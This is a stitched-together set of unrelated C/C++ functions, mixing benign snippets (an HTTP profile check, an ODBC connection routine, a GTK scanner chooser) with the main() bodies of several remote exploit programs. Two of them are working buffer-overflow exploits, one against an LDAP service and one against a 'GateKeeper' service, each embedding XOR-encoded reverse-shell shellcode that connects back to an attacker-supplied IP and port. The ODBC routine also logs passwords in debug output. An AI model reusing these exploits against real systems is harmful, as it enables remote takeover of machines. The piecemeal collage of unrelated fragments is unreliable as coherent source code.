/** \brief Check the validity of the profile */ http_err_t http_sresp_profile_t::check() const throw() { http_err_t http_err; // check the subprofiles http_err = cnx().check(); if( http_err.failed() ) return http_err; // return no error return http_err_t::OK; }
int main(int argc, char *argv[]) { WSADATA wsaData; int sock; banner(); if(argc!=4) { printf("syntax: %s <host> <your_ip> <your_port>\r\n",argv[0]); return -1; } if(WSAStartup(0x0101,&wsaData)!=0) { printf("error: unable to load winsock\r\n"); return -1; } sock=cnx(argv[1]); if(!sock) return -1; start_auth(sock,argv[2],atoi(argv[3])); return 0; }
std::shared_ptr<Connection> Database::getConnection(std::string user,std::string password) { LOG_DEBUG(std::string(__FILE__) + " " + std::to_string(__LINE__)); std::lock_guard<std::mutex> lock(g_i_mutex); SQLHENV henv; SQLHDBC hdbc; SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, &henv); SQLSetEnvAttr(henv, SQL_ATTR_ODBC_VERSION, (void *) SQL_OV_ODBC3, 0); SQLAllocHandle(SQL_HANDLE_DBC, henv, &hdbc); SQLRETURN ret; SQLCHAR outstr[1024]; SQLSMALLINT outstrlen; std::string dsnname; dsnname += "DSN=" + dsnentry_ + ";UID=" + user + ";PWD=" + password; LOG_DEBUG(std::string("ODBCSYSINI :") + std::string(getenv("ODBCSYSINI"))); LOG_DEBUG(std::string("ODBCINI:") + std::string(getenv("ODBCINI"))); LOG_DEBUG(std::string("TNS_ADMIN:") + std::string(getenv("TNS_ADMIN"))); LOG_DEBUG(dsnname); ret = SQLDriverConnect(hdbc, NULL, (SQLCHAR*)dsnname.c_str(), SQL_NTS,outstr, sizeof(outstr), &outstrlen,SQL_DRIVER_COMPLETE); LOG_DEBUG(std::string(__FILE__) + " " + std::to_string(__LINE__)); if (SQL_SUCCEEDED(ret)) { if (ret == SQL_SUCCESS_WITH_INFO) { LOG_DEBUG("SQLDriverConnect"); ODBCError err; LOG_DEBUG(err("SQLDriverConnect", hdbc, SQL_HANDLE_DBC)); } std::shared_ptr<Connection> cnx(new Connection(user,password,henv,hdbc)); cnx->setProvider(provider_); cnx->setSchema(schema_); LOG_DEBUG(std::string("Provider set for connection : ") + DBPROVIDERS[provider_]); return move(cnx); } else { ODBCError err; std::string message = err("SQLDriverConnect", hdbc, SQL_HANDLE_DBC) + "\nDSN : " + dsnentry_ + "\nDatabase user : " + user; throw SQLException(message); } }
int main(int argc, char *argv[]) { int sock,bytes,target,osver=0; WSADATA wsaData; char buffer[8095]; unsigned long host,port; unsigned int i; char req1[] = "\x30\x82" /* bind request */ "\x0a\x3d" /* bind req len */ /* msg id */ "\x02" /* integer */ "\x01" /* length */ "\x01" /* value */ "\x60" /* bind request */ "\x82" /* msg length 2bytes */ "\x01\x36" /* msg length */ /* LDAP ver */ "\x02" /* integer */ "\xff" /* length */ "\x03" /* value */ "\x05\x00" /* DN NULL */ "\x80\x00"; /* Auth simple */ char shellc0de[] = /* sizeof(shellc0de+xorer) == 334 bytes */ /* classic xorer */ "\x90" "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66" "\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa" /* reverse remote shell */ "\x14\x79\x05\x94\x95\x95\x1e\x61\xc0\xc3\xf1\x34\xa5\x95\x95\x95" "\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e\x50\xcb\xc8" "\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95\x95\xfd\xa6" "\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d\xc2\xfd\x4c" "\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4\xc4\xd4\xc4" "\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5\x7d\xec\x95" "\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e\x59\xff\x85" "\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3\xa5\x6a\xa3" "\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b\x16\x79\xc1" "\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68\x53\xd1\xb1" "\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1\x1c\xd1\xb1" "\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85\xc1\xc5\xc4" "\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b\x6a\xa3\xfd" "\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0\xc3\xc2\x1e" "\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e\xdf\x8d\x1e" "\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6\x6a\x69\xa6" "\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67\xae\xe9\xb1" "\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e\xcf\x89\x96" "\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca\xcb\xc8\xce" "\x57\x91\x95"; banner(); if(argc<5||argc>6) syntax(argv[0]); host=inet_addr(argv[2])^0x95959595; port=atoi(argv[3]); if(!isdigit(argv[4][0])||strlen(argv[4])>1) { printf("error: <version> must be one digit\r\n"); syntax(argv[0]); return -1; } target=atoi(argv[4]); if(target<0||target>2) { printf("error: <version> must be 0, 1 or 2\r\n"); syntax(argv[0]); return -1; } if(argc==6) { if(!isdigit(argv[5][0])||strlen(argv[5])>1) { printf("error: [OSver] must be one digit\r\n"); syntax(argv[0]); return -1; } osver=atoi(argv[5]); if(osver<0||osver>1) { printf("error: [OSver] must be 0 or 1\r\n"); syntax(argv[0]); return -1; } } if(port<=0||port>65535) { printf("error: <port> must be between 1 and 65535\r\n"); syntax(argv[0]); return -1; } port=htons((unsigned short)port); port=port<<16; port+=0x0002; port=port^0x95959595; for(i=0; i<sizeof(shellc0de); i++) { if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP) if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) { memcpy(&shellc0de[i],&host,4); host=0; } if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP) if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) { memcpy(&shellc0de[i],&port,4); port=0; } } if(host||port) { printf("error: unabled to find ip/port sequence in shellc0de\r\n"); return -1; } if(WSAStartup(0x0101,&wsaData)!=0) { printf("error: unable to load winsock\r\n"); return -1; } sock=cnx(argv[1],389); if(!sock) return -1; /* <----- magic packet -----> */ strncpy(buffer,req1,13); memset(&buffer[13],0x90,7010); *(unsigned long*)&buffer[13] = SEH_ADDR; if(!osver) { if(!target) *(unsigned long*)&buffer[17] = HIJACKED_2K_PRO; else if(target==1) *(unsigned long*)&buffer[17] = HIJACKED_2K_EXP; else *(unsigned long*)&buffer[17] = HIJACKED_2K_EVL; } else { if(!target) *(unsigned long*)&buffer[17] = HIJACKED_XP_PRO; else if(target==1) *(unsigned long*)&buffer[17] = HIJACKED_XP_EXP; else *(unsigned long*)&buffer[17] = HIJACKED_XP_EVL; } *(unsigned long*)&buffer[21] = 0x90909013; // to avoid 0x00 <unwanted instructions> on winXP memcpy(&buffer[200],shellc0de,sizeof(shellc0de)-1); memcpy(&buffer[7000+23],&req1[10],4); printf("[+] Sending magic packet ..."); bytes=send(sock,buffer,sizeof(buffer)-1,0); printf("Done\r\n"); if(bytes==0) { printf("error: send()\r\n"); } closesocket(sock); return 0; }
int main(int argc, char *argv[]) { WSADATA wsaData; int sock; char buffer[1024],useme[SIZE],*ptr; unsigned long host,port; unsigned int i; char shellc0de[] = /* sizeof(shellc0de+xorer) == 332 bytes */ /* classic xorer */ "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66" "\xb9\x33\x01\x80\x33\x95\x43\xe2\xfa" /* shellc0de */ "\x1e\x61\xc0\xc3\xf1\x34\xa5" "\x95\x95\x95\x1e\xd5\x99\x1e\xe5\x89\x38\x1e\xfd\x9d\x7e\x95\x1e" "\x50\xcb\xc8\x1c\x93\x6a\xa3\xfd\x1b\xdb\x9b\x79\x7d\x38\x95\x95" "\x95\xfd\xa6\xa7\x95\x95\xfd\xe2\xe6\xa7\xca\xc1\x6a\x45\x1e\x6d" "\xc2\xfd\x4c\x9c\x60\x38\x7d\x06\x95\x95\x95\xa6\x5c\xc4\xc4\xc4" "\xc4\xd4\xc4\xd4\xc4\x6a\x45\x1c\xd3\xb1\xc2\xfd\x79\x6c\x3f\xf5" "\x7d\xec\x95\x95\x95\xfd\xd4\xd4\xd4\xd4\xfd\xd7\xd7\xd7\xd7\x1e" "\x59\xff\x85\xc4\x6a\xe3\xb1\x6a\x45\xfd\xf6\xf8\xf1\x95\x1c\xf3" "\xa5\x6a\xa3\xfd\xe7\x6b\x26\x83\x7d\xc4\x95\x95\x95\x1c\xd3\x8b" "\x16\x79\xc1\x18\xa9\xb1\xa6\x55\xa6\x5c\x16\x54\x80\x3e\x77\x68" "\x53\xd1\xb1\x85\xd1\x6b\xd1\xb1\xa8\x6b\xd1\xb1\xa9\x1e\xd3\xb1" "\x1c\xd1\xb1\xdd\x1c\xd1\xb1\xd9\x1c\xd1\xb1\xc5\x18\xd1\xb1\x85" "\xc1\xc5\xc4\xc4\xc4\xff\x94\xc4\xc4\x6a\xe3\xa5\xc4\x6a\xc3\x8b" "\x6a\xa3\xfd\x7a\x5b\x75\xf5\x7d\x97\x95\x95\x95\x6a\x45\xc6\xc0" "\xc3\xc2\x1e\xf9\xb1\x8d\x1e\xd0\xa9\x1e\xc1\x90\xed\x96\x40\x1e" "\xdf\x8d\x1e\xcf\xb5\x96\x48\x76\xa7\xdc\x1e\xa1\x1e\x96\x60\xa6" "\x6a\x69\xa6\x55\x39\xaf\x51\xe1\x92\x54\x5a\x98\x96\x6d\x7e\x67" "\xae\xe9\xb1\x81\xe0\x74\x1e\xcf\xb1\x96\x48\xf3\x1e\x99\xde\x1e" "\xcf\x89\x96\x48\x1e\x91\x1e\x96\x50\x7e\x97\xa6\x55\x1e\x40\xca" "\xcb\xc8\xce\x57\x91\x95"; banner(); if(argc!=4) syntax(argv[0]); host=inet_addr(argv[2])^0x95959595; port=atoi(argv[3]); if(port<=0||port>65535) { printf("error: <port> must be between 1 and 65535\r\n"); return -1; } port=htons((unsigned short)port); port=port<<16; port+=0x0002; port=port^0x95959595; for(i=0;i<sizeof(shellc0de);i++) { if((unsigned char)shellc0de[i]==HOP&&(unsigned char)shellc0de[i+1]==HOP) if((unsigned char)shellc0de[i+2]==HOP&&(unsigned char)shellc0de[i+3]==HOP) { memcpy(&shellc0de[i],&host,4); host=0; } if((unsigned char)shellc0de[i]==POP&&(unsigned char)shellc0de[i+1]==POP) if((unsigned char)shellc0de[i+2]==POP&&(unsigned char)shellc0de[i+3]==POP) { memcpy(&shellc0de[i],&port,4); port=0; } } if(host||port) { printf("[i] error: unabled to find ip/port sequence in shellc0de\r\n"); return -1; } if(WSAStartup(0x0101,&wsaData)!=0) { printf("[i] error: unable to load winsock\r\n"); return -1; } printf("[-] Getting version through administration interface\r\n"); sock=cnx(argv[1],ADMIN_PORT); if(!sock) printf("[i] warning: couldn't connect to admin int to get version, trying anyway\r\n"); else { send(sock,"I'm a script kiddie\r\n",21,0); memset(buffer,0,sizeof(buffer)); recv(sock,buffer,sizeof(buffer),0); memset(buffer,0,sizeof(buffer)); recv(sock,buffer,sizeof(buffer),0); ptr=strstr(buffer,"GateKeeper@"); if(!ptr) printf("[i] waring: version not found, trying anyway\r\n"); else { ptr+=11; if(strncmp(ptr,VERSION,strlen(VERSION))) { printf("[i] error: wrong version\r\n"); return -1; } printf("[i] %-44s ...OK\r\n","version"); } } printf("[i] Starting to exploit\r\n"); sock=cnx(argv[1],PORT); if(!sock) return -1; printf("[i] Preparing magic %-28s ...","packet"); memset(useme,0x90,SIZE); memcpy(&useme[RET_POS-0x8ac],shellc0de,sizeof(shellc0de)); *(unsigned long*)&useme[RET_POS] = RET_ADDR; // eip pointing to jmp ebx in exe memory memcpy(&useme[RET_POS+12],"\xe9\xed\xf6\xff\xff",5); // jmp $ - 0x92c printf("Done\r\n"); printf("[i] Sending magic packet ..."); send(sock,REQ,strlen(REQ),0); send(sock,useme,sizeof(useme),0); send(sock,REQ2,strlen(REQ2),0); printf("Done\r\n"); closesocket(sock); return 0; }
void chooser::create_device (const std::set<scanner::info>& devices, const std::string& udi) { std::set<scanner::info>::const_iterator it = devices.begin (); while (devices.end () != it && udi != it->udi ()) { ++it; } if (devices.end () != it) { Glib::RefPtr< Gdk::Window > window = get_window (); if (window) { window->set_cursor (Gdk::Cursor (Gdk::WATCH)); Gdk::flush (); } scanner::ptr ptr; std::string why; try { // FIXME This is a bit clunky but both calls may be time // consuming and cannot be put in a separate thread if // the connexion and/or the scanner objects are run via // process separation. The child process would exit at // the end of the thread. while (Gtk::Main::events_pending ()) Gtk::Main::iteration (); connexion::ptr cnx (connexion::create (it->connexion (), it->path ())); while (Gtk::Main::events_pending ()) Gtk::Main::iteration (); ptr = scanner::create (cnx, *it); } catch (const std::exception& e) { why = e.what (); } catch (...) { // FIXME set a why we failed to create a device } if (window) { window->set_cursor (); } if (ptr) { cache_ = get_active (); set_tooltip_text (it->udi ()); signal_device_changed_.emit (ptr); } else { const std::string& name = get_active ()->get_value (cols_->name); const std::string& udi = get_active ()->get_value (cols_->udi); inhibit_callback_ = true; if (cache_) set_active (cache_); inhibit_callback_ = false; BOOST_THROW_EXCEPTION (std::runtime_error ((format (_("Cannot access %1%\n(%2%)\n%3%")) % name % udi % _(why) ).str ())); } } }